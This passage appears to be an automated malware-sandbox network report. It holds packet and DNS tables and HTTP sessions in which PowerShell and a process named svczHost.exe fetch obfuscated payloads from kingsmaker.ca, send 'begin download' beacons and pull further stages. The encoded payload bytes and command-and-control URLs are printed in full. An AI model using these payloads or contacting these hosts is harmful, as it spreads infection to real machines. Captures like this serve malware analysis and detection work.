                                                                                                                            Nov 29, 2024 08:32:41.662427902 CET4435000713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:41.664851904 CET50007443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:41.664871931 CET4435000713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:41.665297031 CET50007443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:41.665301085 CET4435000713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:42.107778072 CET4435000713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:42.107848883 CET4435000713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:42.107923031 CET50007443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:42.113522053 CET50007443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:42.113539934 CET4435000713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:42.113559961 CET50007443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:42.113564968 CET4435000713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:48.512881994 CET4986280192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:32:48.633166075 CET8049862104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:48.633310080 CET4986280192.168.2.5104.21.75.170
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 29, 2024 08:30:21.457648039 CET6203453192.168.2.51.1.1.1
                                                                                                                            Nov 29, 2024 08:30:21.601361036 CET53620341.1.1.1192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:44.747935057 CET137137192.168.2.5192.168.2.255
                                                                                                                            Nov 29, 2024 08:30:45.504729986 CET137137192.168.2.5192.168.2.255
                                                                                                                            Nov 29, 2024 08:30:46.269165993 CET137137192.168.2.5192.168.2.255
                                                                                                                            Nov 29, 2024 08:30:51.527834892 CET6408853192.168.2.51.1.1.1
                                                                                                                            Nov 29, 2024 08:31:08.765706062 CET5211153192.168.2.51.1.1.1
                                                                                                                            Nov 29, 2024 08:31:21.215451002 CET5456953192.168.2.51.1.1.1
                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Nov 29, 2024 08:30:21.457648039 CET192.168.2.51.1.1.10x25d3Standard query (0)kingsmaker.caA (IP address)IN (0x0001)false
                                                                                                                            Nov 29, 2024 08:30:51.527834892 CET192.168.2.51.1.1.10x5a48Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                            Nov 29, 2024 08:31:08.765706062 CET192.168.2.51.1.1.10xbcfdStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                            Nov 29, 2024 08:31:21.215451002 CET192.168.2.51.1.1.10x8105Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Nov 29, 2024 08:30:21.601361036 CET1.1.1.1192.168.2.50x25d3No error (0)kingsmaker.ca104.21.75.170A (IP address)IN (0x0001)false
                                                                                                                            Nov 29, 2024 08:30:21.601361036 CET1.1.1.1192.168.2.50x25d3No error (0)kingsmaker.ca172.67.179.67A (IP address)IN (0x0001)false
                                                                                                                            Nov 29, 2024 08:30:51.848891020 CET1.1.1.1192.168.2.50x5a48No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 29, 2024 08:31:08.906593084 CET1.1.1.1192.168.2.50xbcfdNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Nov 29, 2024 08:31:21.432976961 CET1.1.1.1192.168.2.50x8105No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            • kingsmaker.ca
                                                                                                                            • otelrules.azureedge.net
                                                                                                                            • slscr.update.microsoft.com
                                                                                                                            • https:
                                                                                                                              • p13n.adobe.io
                                                                                                                            • armmf.adobe.com
                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.549862104.21.75.170806584C:\Windows\Temp\svczHost.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 29, 2024 08:31:33.618205070 CET72OUTGET /api/check HTTP/1.1
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Nov 29, 2024 08:31:35.315023899 CET1236INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:31:35 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: keep-alive
                                                                                                                            Cache-Control: no-store,no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2BM5Oa%2FXo07a%2FUf9DpsKNtsWT0lYz3dxdVK%2BxYPtnbE8%2Bw3pbeA3KLI1ukV5ClOg%2FMGyn71YczD0vhkR03RSpYxa0LwxbItMRbMZfins1ysJh%2Be%2FicmZdOHDCG9LkLjqYxt698zP5Zhm"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=55742&min_rtt=1400&rtt_var=6021&sent=26585&recv=12411&lost=0&retrans=48&sent_bytes=37964000&recv_bytes=145593&delivery_rate=18660531&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e61d2b727ce2-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=72&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            Data Raw: 31 36 33 0d 0a 31 37 33 32 38 36 35 34 39 35 7c 66 76 47 4f 36 47 61 34 75 30 45 38 59 4e 73 54 52 4d 2b 64 52 4a 69 4a 33 46 49 6a 78 57 4c 4a 45 77 5a 53 2b 2f 6c 50 7a 62 6b 75 51 39 53 4a 72 45 65 6b 42 6d 46 65 74 67 55 4d 7a 55 43 47 64 53 61 7a 32 6f 61 39 49 43 58 67 52 41 4f 53 6f 57 43 50 51 46 77 33 4c 63 42 54 66 61 44 68 52 2b 35 77 4b 30 6a 64 48 4c 54 53 44 73 4d 6c 32 74 78 54 64 2f 79 4a 50 35 44 70 6d 6e 6e 6f 2b 6d 59 75 34 58
                                                                                                                            Data Ascii: 1631732865495|fvGO6Ga4u0E8YNsTRM+dRJiJ3FIjxWLJEwZS+/lPzbkuQ9SJrEekBmFetgUMzUCGdSaz2oa9ICXgRAOSoWCPQFw3LcBTfaDhR+5wK0jdHLTSDsMl2txTd/yJP5Dpmnno+mYu4X
                                                                                                                            Nov 29, 2024 08:31:35.315042019 CET217INData Raw: 45 4a 49 79 6c 72 52 30 55 6a 6e 43 77 75 48 6a 52 38 6c 74 6f 56 69 49 61 7a 39 71 49 4e 31 36 31 35 78 50 4f 75 6a 65 66 56 62 77 78 2f 6f 68 47 36 2b 63 6f 37 70 59 77 56 4f 2f 50 5a 2b 72 6d 34 53 4a 32 77 53 69 7a 31 44 6e 35 66 4f 44 75 30
                                                                                                                            Data Ascii: EJIylrR0UjnCwuHjR8ltoViIaz9qIN1615xPOujefVbwx/ohG6+co7pYwVO/PZ+rm4SJ2wSiz1Dn5fODu0TokAv5Db07cFvjX5+yAdcSS3Z79McSwe5MeleAul00tOG8RiFgY6d1YN0fRvTqwAnQz8GlFUdJ4eM5neuhYr3u6VDuBdJohUdgR5NTZAVYYrudq3IIf5T4nL7CvB0A==0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.549704104.21.75.1704437120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:22 UTC390OUTGET /file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59ea3fe07e54381481ca0bece87f5a691b18216ec8f663043055b37a6c8d7a59731af4b6e1340bfd787088106580f90f257aa865ae7b57e00e4873a697e/Windows%20Defender/4/4/user/203 HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-29 07:30:23 UTC1115INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:23 GMT
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Content-Length: 2864
                                                                                                                            Connection: close
                                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTh5ea4DOyIQq08p0cwqLXJS3BLta2sklt5oPad3JkQz7niU912yZZy4q9np8E7D%2Bg%2BBj4te43iFGkrHCB%2Bgu6tCbuoDEzDjOFUiIfCptlUPyHFR8UFVOD6ApQ2G7cD9XS7pSsBAZ%2BrK"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=26735&min_rtt=1013&rtt_var=29199&sent=19529&recv=9517&lost=0&retrans=0&sent_bytes=27506216&recv_bytes=267238&delivery_rate=47135761&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e45f2cbcf793-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1639&rtt_var=627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1004&delivery_rate=1726788&cwnd=32&unsent_bytes=0&cid=886d2b996b3dce20&ts=1033&x=0"
                                                                                                                            2024-11-29 07:30:23 UTC254INData Raw: 25 62 63 63 67 69 67 64 79 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 56 6d 53 4b 65 6a 30 59 55 6c 6d 60 60 6a 30 35 55 57 53 6a 60 6a 30 54 53 6c 6d 4e 53 31 71 6e 56 57 53 53 4c 47 71 44 53 6c 69 60 60 6a 71 72 56 6a 53 5b 4c 31 30 75 54 59 71 60 60 6c 53 72 55 6c 71 6f 64 57 71 70 5b 7b 53 4f 53 31 71 6e 55 56 30 46 63 54 34 75 54 6c 69 51 57 31 5b 71 55 6a 53 72 60 54 30 44 57 6c 6d 4e 63 57 5b 73 56 6d 65 4b 4c 6d 71 49 57 6c 69 4e 57 47 57 34 55 56 30 56 60 30 6d 70 54 6c 71 4f 63 54 34 70 55 6c 30 4f 4f 47 6d 59 53 55 53 4f 60 6c 4c 79 56 56 71 4b 4f 47 71 44
                                                                                                                            Data Ascii: %bccgigdy<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#VmSKej0YUlm``j05UWSj`j0TSlmNS1qnVWSSLGqDSli``jqrVjS[L10uTYq``lSrUlqodWqp[{SOS1qnUV0FcT4uTliQW1[qUjSr`T0DWlmNcW[sVmeKLmqIWliNWGW4UV0V`0mpTlqOcT4pUl0OOGmYSUSO`lLyVVqKOGqD
                                                                                                                            2024-11-29 07:30:23 UTC1369INData Raw: 55 55 47 4e 63 57 54 78 55 56 30 4b 64 54 30 54 52 55 53 4e 4c 6d 6d 32 55 6f 71 4e 60 54 34 44 63 46 30 5b 57 46 65 32 55 6f 71 46 60 6a 31 78 52 55 57 5b 60 6a 6d 37 55 54 65 57 65 30 6d 75 57 59 65 51 57 47 54 78 56 56 30 52 63 47 71 49 57 59 6d 5b 57 46 4c 79 55 30 53 4b 4c 57 71 70 52 59 71 4f 64 6d 44 76 55 30 53 57 4f 57 6d 70 63 46 30 60 57 44 4b 75 56 6a 53 72 63 54 38 44 52 55 57 60 53 46 72 76 56 6c 30 60 63 47 71 59 57 55 4f 60 53 30 71 72 55 6c 71 6e 60 54 34 37 58 7b 43 4f 57 46 69 70 55 59 71 57 4c 6d 6d 37 53 6c 75 51 57 47 5b 70 55 6a 65 52 60 30 6d 75 53 59 71 4e 53 44 31 31 55 55 4b 47 4f 44 30 37 50 55 53 5b 60 6a 71 75 55 6a 65 60 60 30 71 44 57 55 57 60 60 6c 4f 37 55 6c 71 6b 60 54 38 32 4c 44 75 4a 53 31 34 33 5b 47 62 30 4c 44 6d
                                                                                                                            Data Ascii: UUGNcWTxUV0KdT0TRUSNLmm2UoqN`T4DcF0[WFe2UoqF`j1xRUW[`jm7UTeWe0muWYeQWGTxVV0RcGqIWYm[WFLyU0SKLWqpRYqOdmDvU0SWOWmpcF0`WDKuVjSrcT8DRUW`SFrvVl0`cGqYWUO`S0qrUlqn`T47X{COWFipUYqWLmm7SluQWG[pUjeR`0muSYqNSD11UUKGOD07PUS[`jquUje``0qDWUW``lO7Ulqk`T82LDuJS143[Gb0LDm
                                                                                                                            2024-11-29 07:30:23 UTC1241INData Raw: 6d 69 4a 64 6a 6d 45 54 6c 38 60 57 31 5b 73 56 6d 69 4a 64 6a 6d 45 4c 54 4f 68 4c 6d 48 30 52 54 4f 52 60 56 48 78 54 6b 57 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 56 55 4b 46 4c 47 6a 78 60 45 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 5b 53 4c 44 75 4b 50 31 47 6f 52 54 44 76 52 33 5b 53 4c 44 75 44 54 59 40 7b 58 54 65 72 62 30 71 55 5b 33 75 5b 4c 6b 6a 79 58 6c 34 53 5b 31 79 59 5b 45 43 4b 53 44 47 76 53 47 47 76 4f 31 53 53 63 31 71 44 54 56 38 4a 5b 44 69 4a 4f 56 57 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6d 53 60 57 7b 57 73 52 54 4f 4a 60 57 71 59 5b 49 43 68 60 54 4b 73
                                                                                                                            Data Ascii: miJdjmETl8`W1[sVmiJdjmELTOhLmH0RTOR`VHxTkWDTV8oRTOC[1mEPVeKRECNP3mC[1mEPVeKP1GoVUKFLGjx`EeDTV8oRTOC[1mEPVeKP1GoRTOCUjOqPVeKP1GoRTOC[3[SLDuKP1GoRTDvR3[SLDuDTY@{XTerb0qU[3u[LkjyXl4S[1yY[ECKSDGvSGGvO1SSc1qDTV8J[DiJOVW2LDuKP1GoRTOC[1mEPmS`W{WsRTOJ`WqY[ICh`TKs


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.549705104.21.75.1704437120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:25 UTC284OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6635a8c2001ae9b439940f2a4e27446bc2 HTTP/1.1
                                                                                                                            Content-Type: application/json
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Content-Length: 302
                                                                                                                            2024-11-29 07:30:25 UTC302OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 6b 69 6e 67 73 6d 61 6b 65 72 2e 63 61 2f 66 69 6c 65 32 2f 31 63 62 66 33 31 31 37 63 31 31 62 34 62 61 61 34 34 64 31 61 66 32 65 64 36 37 32 64 33 66 37 65 36 38 32 66 38 38 30 62 61 32 61 66 36 64 61 39 61 62 34 39 62 30 35 62 36 65 64 65 62 36 64 65 61 35 35 32 32 65 64 62 34 63 32 63 63 36 63 38 61 61 38 32 37 35 62 32 38 64 33 35 36 65 36 32 62 32 31 32 38 37 66 30 37 33 62 34 39 66 61 38 30 37 31 63 33 62 39 62 32 33 30 65 30 62 65 30 39 35 36 62 64 65 64 65 32 61 37 35 39 32 35 66 32 33 33 34 34 39 35 39 62 39 66 65 30 66 64 39 66 38 32 39 64 39 34 66 66 65 65 65 37 64 66 65 36 38 62 37 37 34 31 38 63 33 35 36 63 31 64 39 35 63 34 64 64 62 61 33 34
                                                                                                                            Data Ascii: [ "\"begin download https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34
                                                                                                                            2024-11-29 07:30:26 UTC1003INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:26 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRwNnVM4wthnVmOMPRX7a%2F8Q6j8dNVxuWXybAL1M%2FM1xn%2BQZ6MV9QNSIeoWrcik6zqPKq1rT5baRosZW%2ByWEP7w05W%2FNHFyLkrT6lnXZx1HwZkc%2BJxBXbqvLroM7KbsxnztnBuUzVBI5"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=36798&min_rtt=1062&rtt_var=31419&sent=20599&recv=9673&lost=0&retrans=0&sent_bytes=28907501&recv_bytes=317730&delivery_rate=37512408&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e46f0903c340-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1488&rtt_var=573&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1246&delivery_rate=1883870&cwnd=134&unsent_bytes=0&cid=e1fb166da22708f7&ts=991&x=0"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.549706104.21.75.1704437120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:27 UTC364OUTGET /file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522edb4c2cc6c8aa8275b28d356e62b21287f073b49fa8071c3b9b230e0be0956bdede2a75925f23344959b9fe0fd9f829d94ffeee7dfe68b77418c356c1d95c4ddba34383a8308b2f4fdd59f7367 HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            2024-11-29 07:30:28 UTC1120INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:28 GMT
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Content-Length: 2850
                                                                                                                            Connection: close
                                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MyA%2FGEOxsIBvqU6yhY6sg%2FgBvE9hfkj5Kea0pejx9sq81CC%2F4oCL0GeyqIeZEmtERZE70Ba%2FOuOiY%2FYY1dxm8DRvbmQQHZjlZIMHoaEYIx7RXZre5RAnT4SGz6RlVMp2POdKI1vcoHnu"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=27846&min_rtt=1400&rtt_var=30573&sent=26502&recv=12325&lost=0&retrans=48&sent_bytes=37925716&recv_bytes=109371&delivery_rate=18660531&cwnd=272&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e47dda7ac40e-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1674&rtt_var=632&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1002&delivery_rate=1725768&cwnd=175&unsent_bytes=0&cid=fc685e57e0d26f25&ts=1001&x=0"
                                                                                                                            2024-11-29 07:30:28 UTC249INData Raw: 25 78 60 70 68 77 64 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 55 56 30 52 63 47 6d 54 57 59 6d 60 57 30 4b 75 56 57 65 57 64 6a 34 70 53 6c 71 4e 53 44 71 6e 55 6f 71 4a 60 54 38 44 57 59 71 4f 57 44 71 6e 56 6d 65 5b 4f 44 30 59 53 59 71 4e 53 47 6a 78 55 6a 53 6a 60 31 34 37 50 6c 6d 51 57 31 71 72 55 6d 53 4e 60 57 71 49 57 6c 6d 5b 4c 6d 4b 72 56 6c 71 56 60 47 6d 59 55 6c 71 4f 57 44 34 71 56 56 30 57 65 31 30 59 54 55 47 4e 63 54 31 31 55 6d 65 4f 4f 54 30 59 56 6c 69 60 53 46 69 70 55 30 65 4b 4c 57 71 54 54 55 53 51 53 47 4b 71 55 6f 71 53 64
                                                                                                                            Data Ascii: %x`phwd<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#UV0RcGmTWYm`W0KuVWeWdj4pSlqNSDqnUoqJ`T8DWYqOWDqnVme[OD0YSYqNSGjxUjSj`147PlmQW1qrUmSN`WqIWlm[LmKrVlqV`GmYUlqOWD4qVV0We10YTUGNcT11UmeOOT0YVli`SFipU0eKLWqTTUSQSGKqUoqSd
                                                                                                                            2024-11-29 07:30:28 UTC1369INData Raw: 47 71 49 52 59 6d 60 57 30 54 31 56 6c 71 4e 60 44 30 37 54 59 69 60 57 46 72 30 55 6c 30 47 65 31 38 59 56 6c 69 4f 4c 6a 5b 73 56 6d 53 6b 4c 6d 6d 54 54 6c 79 4f 53 47 5b 75 55 6b 4b 5b 65 31 38 54 58 7b 43 60 57 47 4b 71 55 6c 30 46 60 6d 6d 75 55 55 4f 4e 57 30 47 32 56 6c 71 60 60 6a 34 70 54 55 47 60 60 6c 72 78 56 6a 53 43 4c 6d 71 59 53 55 43 60 53 44 44 76 55 6d 53 73 65 30 71 70 53 59 6d 5b 57 46 53 70 56 57 53 6e 60 44 34 37 54 55 47 4f 64 6a 30 37 55 30 65 4f 4c 31 38 44 5b 46 75 4f 57 46 75 34 56 59 71 5b 4f 44 30 59 53 6c 71 5b 57 47 6d 71 55 32 62 76 52 31 71 49 55 6f 5b 6a 57 7b 54 76 52 54 50 76 5b 31 30 54 50 59 65 51 65 7b 43 4d 53 47 47 77 55 6a 4f 6f 4c 44 75 60 63 6d 5b 30 56 55 4f 52 62 46 48 78 4f 46 65 57 4c 6d 5b 30 56 6a 4f 42
                                                                                                                            Data Ascii: GqIRYm`W0T1VlqN`D07TYi`WFr0Ul0Ge18YVliOLj[sVmSkLmmTTlyOSG[uUkK[e18TX{C`WGKqUl0F`mmuUUONW0G2Vlq``j4pTUG``lrxVjSCLmqYSUC`SDDvUmSse0qpSYm[WFSpVWSn`D47TUGOdj07U0eOL18D[FuOWFu4VYq[OD0YSlq[WGmqU2bvR1qIUo[jW{TvRTPv[10TPYeQe{CMSGGwUjOoLDu`cm[0VUORbFHxOFeWLm[0VjOB
                                                                                                                            2024-11-29 07:30:28 UTC1232INData Raw: 47 6f 52 54 4f 43 5b 31 6d 48 4c 44 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 5b 4c 6a 58 76 56 55 4b 6e 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 6d 44 76 52 31 6d 45 50 56 65 4b 50 55 43 4d 5b 6d 44 76 52 31 53 53 62 45 4f 69 53 33 79 7b 56 6d 4f 6f 60 30 6a 78 4e 55 47 68 63 6d 47 6f 55 47 65 6a 4c 44 6d 44 50 59 43 44 54 59 40 32 53 47 47 77 52 6a 53 53 63 31 71 6a 52 44 6e 30 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 57 47 71 59 4f 56 75 4b 50 31 71 71 56 6d 65 6a 62 46 4b 71 50 6c 75 68 4c 33 53 30 58 6a 62 34 60 47 71 45 50 56 75 6a 56 44 71 76 52 56 71 7b 55 6a 4f 6f 60 31 71 4a 53 31 34 33 58 6c 34 52 63 46 4b 74 54 56 65 50 54
                                                                                                                            Data Ascii: GoRTOC[1mHLD4E`TGoRTOC[1mEPVe[LjXvVUKnO1SSc3eKP1GoRTOC[1mEPVeKP1GNP3mC[1mEPVeKP1Go[mDvR1mEPVeKPUCM[mDvR1SSbEOiS3y{VmOo`0jxNUGhcmGoUGejLDmDPYCDTY@2SGGwRjSSc1qjRDn0[YbvR1mEPVeKP1GoRTOBWGqYOVuKP1qqVmejbFKqPluhL3S0Xjb4`GqEPVujVDqvRVq{UjOo`1qJS143Xl4RcFKtTVePT


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.549707104.21.75.1704437120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:30 UTC284OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66a2bd10c53ccb7e2954104e6af3dc2acc HTTP/1.1
                                                                                                                            Content-Type: application/json
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Content-Length: 302
                                                                                                                            2024-11-29 07:30:30 UTC302OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 6b 69 6e 67 73 6d 61 6b 65 72 2e 63 61 2f 66 69 6c 65 32 2f 31 35 64 34 37 64 36 31 34 39 36 62 62 63 35 36 38 36 64 37 34 30 36 63 30 38 31 32 64 65 61 35 32 65 64 66 61 65 33 36 31 63 34 32 61 37 32 62 38 35 33 31 32 61 65 66 38 31 61 33 34 36 36 34 37 64 37 30 62 39 62 65 35 33 62 64 65 62 63 64 65 66 35 61 61 63 63 31 33 62 62 65 30 31 64 35 36 63 38 35 63 39 31 66 61 64 38 63 39 62 35 65 34 38 38 34 62 37 34 31 64 62 32 65 65 38 66 33 61 33 34 31 65 39 39 36 61 30 39 66 61 33 61 64 65 37 36 61 34 65 30 35 66 37 66 30 39 37 34 65 34 62 36 61 63 62 63 37 35 64 30 66 36 63 36 34 35 66 39 36 64 30 36 65 61 34 64 30 34 35 39 30 66 31 32 61 37 63 61 38 61 37
                                                                                                                            Data Ascii: [ "\"begin download https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be53bdebcdef5aacc13bbe01d56c85c91fad8c9b5e4884b741db2ee8f3a341e996a09fa3ade76a4e05f7f0974e4b6acbc75d0f6c645f96d06ea4d04590f12a7ca8a7
                                                                                                                            2024-11-29 07:30:31 UTC996INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:30 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: close
                                                                                                                            CF-Cache-Status: DYNAMIC
